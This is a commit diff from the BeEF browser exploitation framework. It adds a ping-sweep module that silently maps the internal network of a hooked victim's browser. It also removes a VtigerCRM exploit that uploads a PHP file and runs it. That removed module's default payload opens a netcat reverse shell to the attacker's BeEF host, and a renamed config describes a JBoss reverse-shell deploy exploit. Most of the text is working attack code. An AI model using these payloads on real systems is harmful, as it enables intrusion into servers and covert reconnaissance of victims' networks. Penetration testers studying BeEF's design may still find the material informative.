function do_scan(host, timeout) {
var status=false;
ping="";
try {
status = java.net.InetAddress.getByName(host).isReachable(timeout);
} catch(e) { /*handle exception...? */ }
if (status) {
ping = host + " is alive!";
} else {
if(verbose) {
ping = host + " is not alive";
}
}
return ping;
}
// call do_scan for each ip
// use of setInterval trick to avoid slow script warnings
i=0;
if(ips.length>1) {
int_id = setInterval( function() {
host = do_scan(ips[i++],timeout);
if(host!="") beef.net.send('<%= @command_url %>', <%= @command_id %>, 'host='+host);
if(i==ips.length) { clearInterval(int_id); beef.net.send('<%= @command_url %>', <%= @command_id %>, 'host=Ping sweep finished'); }
}, delay);
} else {
host = do_scan(ips[i],timeout);
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'host='+host);
}
});

11
modules/network/jboss_jmx_upload_exploit/config.yaml → modules/network/ping_sweep/config.yaml
View File

@@ -15,11 +15,12 @@
#
beef:
module:
jboss_jmx_upload_exploit:
ping_sweep:
enable: true
category: "Network"
name: "Jboss 6.0.0M1 JMX Deploy Exploit"
description: "Deploy a JSP reverse or bind shell (Metasploit one) using the JMX exposed deploymentFileRepository MBean of JBoss. The first request made is a HEAD one to bypass auth and deploy the malicious JSP, the second request is a GET one that triggers the reverse connection to the specified MSF listener.<br>Remember to run the MSF multi/hanlder listener with java/jsp_shell_reverse_tcp as payload, in case you are using the reverse payload."
authors: ["antisnatchor", "l33tb0y"]
name: "Ping Sweep"
description: "Discover active hosts in the internal network of the hooked browser. It works calling a Java method from JavaScript and do not require user interaction."
authors: ["jgaliana"]
target:
working: ["ALL"]
working: ["FF"]
not_working: ["C", "S", "O", "IE"]

40
modules/network/ping_sweep/module.rb Normal file
View File

@@ -0,0 +1,40 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Ping Sweep Module - jgaliana
# Discover active hosts in the internal network of the hooked browser.
# It works calling a Java method from JavaScript and do not require user interaction.
class Ping_sweep < BeEF::Core::Command
def self.options
return [
{'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class or IP)', 'value' => '192.168.0.1-192.168.0.254'},
{'name' => 'timeout', 'ui_label' => 'Timeout (ms)', 'value' => '1000'},
{'name' => 'delay', 'ui_label' => 'Delay between requests (ms)', 'value' => '100'}
]
end
def post_execute
content = {}
content['host'] =@datastore['host'] if not @datastore['host'].nil?
if content.empty?
content['fail'] = 'No active hosts have been discovered.'
end
save content
end
end

218
modules/network/vtiger_crm_upload_exploit/command.js
View File

@@ -1,218 +0,0 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
// VtigerCRM <= 5.0.4 "chained exploitation" PoC
// Hacked up for OWASP New Zealand Day, July 13th 2009
//
// Thanks for the BeEF Wade :)
// Ported to Ruby BeEF by xntrik 2010
beef.execute(function() {
//Doing the same trick I used in detect_tor to ensure exploit runs once
// xntrik
if (document.getElementById('vtigerimg')) {
//document.body.removeChild(document.getElementById('vtigerimg'));
//beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=There was a stagnant vtiger ID. Aborted!');
return "Exploit running already";
}
var img = new Image();
img.setAttribute("style","visibility:hidden");
img.setAttribute("width","0");
img.setAttribute("height","0");
img.id = 'vtigerimg';
document.body.appendChild(img);
baseurl = "<%= @vtiger_url %>";
function get_ajax() {
var http_request;
// use the ActiveX control for IE5.x and IE6
try {
http_request = new ActiveXObject("MSXML2.XMLHTTP");
} catch (othermicrosoft){
try {
http_request = new ActiveXObject("Microsoft.XMLHTTP");
} catch (native) {
// If IE7, Mozilla, Safari, etc: Use native object
http_request = new XMLHttpRequest();
}
}
return http_request;
}
function do_upload(){
setTimeout(function() {ajax_upload()}, 1000);
}
// In a nutshell:
//
// 1) build url
// 2) construct the request object
// 3) POST the form
// 4) once requestdone, call do_callfile()
function ajax_upload(){
var targeturl = baseurl + '/index.php?module=uploads&action=add2db&return_module=Home&return_action=index';
var http_request;
http_request = false;
http_request = get_ajax();
if (!http_request) {
// fail silently!
return false;
}
//prepare the POST
var boundaryString = 'PWNED';
var boundary = '-----------------------------PWNED';
var requestbody =
boundary + '\r\n'
+ 'Content-Disposition: form-data; name="MAX_FILE_SIZE"' + '\r\n'
+ '\r\n'
+ 3000000 + '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="return_module"' + '\r\n'
+ '\r\n'
+ '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="return_action"' + '\r\n'
+ '\r\n'
+ '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="return_id"' + '\r\n'
+ '\r\n'
+ '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="uploadsubject"' + '\r\n'
+ '\r\n'
+ '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="filename"; filename="<%= @mal_filename %>.<%= @mal_ext %>"' + '\r\n'
+ 'Content-Type: application/x-httpd-php' + '\r\n'
+ '\r\n'
+ '<%= @vtiger_php %>' + '\r\n'
+ '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="filename_hidden"' + '\r\n'
+ '\r\n'
+ '<%= @mal_filename %>.<%= @mal_ext %>'
+ '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="txtDescription"' + '\\r\n'
+ '\r\n'
+ 'drop it like its hot' + '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="save"' + '\r\n'
+ '\r\n'
+ 'Attach' + '\r\n'
+ boundary;
var uploadstate = 0;
http_request.onreadystatechange = function() {
if (http_request.readyState == 4) {
if (http_request.status == 200) {
uploadstate = 3;
} else {
uploadstate = 2;
}
} else {
uploadstate = 1;
}
return;
};
http_request.open("POST", targeturl, true);
http_request.setRequestHeader("Content-type", "multipart/form-data; boundary=---------------------------PWNED");
http_request.setRequestHeader("Content-length", requestbody.length);
http_request.send(requestbody);
setTimeout(function() {
if (uploadstate == 0) {
//something went way wrong
document.body.removeChild(document.getElementById('vtigerimg'));
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Error in file upload');
} else if (uploadstate == 1) {
//we never got a response from the server
document.body.removeChild(document.getElementById('vtigerimg'));
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Server did not respond while trying to upload file');
} else if (uploadstate == 2) {
//we got a response that was NOT a 200
document.body.removeChild(document.getElementById('vtigerimg'));
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Server gave an invalid response while trying to upload file');
} else if (uploadstate == 3) {
//We got a 200, so hopefully the file was uploaded
//be_graceful();
do_callfile(0, 1000);
}
},<%= @upload_timeout %>);
return;
}
function do_callfile(start, count){
if (document.getElementById('vtigerimg') == null) {
return false;
}
for (i=start;i<=start+count;i++)
{
var http_request = false;
http_request = get_ajax();
if (!http_request) {
// fail silently!
return false;
}
var findurl = baseurl + "<%= @vtiger_filepath %>" + i + "_<%= @mal_filename %>.<%= @mal_ext %>";
var requestbody = "birds of a feather flock together";
http_request.open('POST', findurl, false);
http_request.setRequestHeader("Content-length", requestbody.length);
http_request.send(requestbody);
if (http_request.status == 200) {
document.body.removeChild(document.getElementById('vtigerimg'));
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=File Uploaded AND Executed ('+findurl+')');
return;
}
}
return;
}
// Try the upload
function do_main(){
do_upload();
return;
}
// Run the sploit
do_main();
});

46
modules/network/vtiger_crm_upload_exploit/module.rb
View File

@@ -1,46 +0,0 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Vtiger_crm_upload_exploit < BeEF::Core::Command
def self.options
time = Time.new
weekno = case time.day
when 1..7 then 1
when 8..14 then 2
when 15..21 then 3
when 22..28 then 4
else 5
end
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
return [
{'name'=>'vtiger_url', 'ui_label' =>'Target Web Server','value'=>'http://vulnerable-vtiger.site','width'=>'400px'},
{'name'=>'vtiger_filepath','ui_label'=>'Target Directory','value'=>'/storage/'+time.year.to_s()+'/'+time.strftime("%B")+'/week'+weekno.to_s()+'/','width'=>'400px'},
{'name'=>'mal_filename','ui_label'=>'Malicious Filename','value'=>rand(32**10).to_s(32),'width'=>'400px'},
{'name'=>'mal_ext','ui_label'=>'Malicious File Extension','value'=>'PHP','width'=>'400px'},
{'name'=>'vtiger_php','ui_label'=>'Injected PHP (must escape single quotes)','value'=>'<?php passthru("/bin/nc -e /bin/sh '+beef_host+' 8888"); ?>','type'=>'textarea','width'=>'400px','height'=>'100px'},
{'name'=>'upload_timeout','ui_label'=>'Upload Timeout','value'=>'5000'}
]
end
def post_execute
return if @datastore['result'].nil?
save({'result' => @datastore['result']})
end
end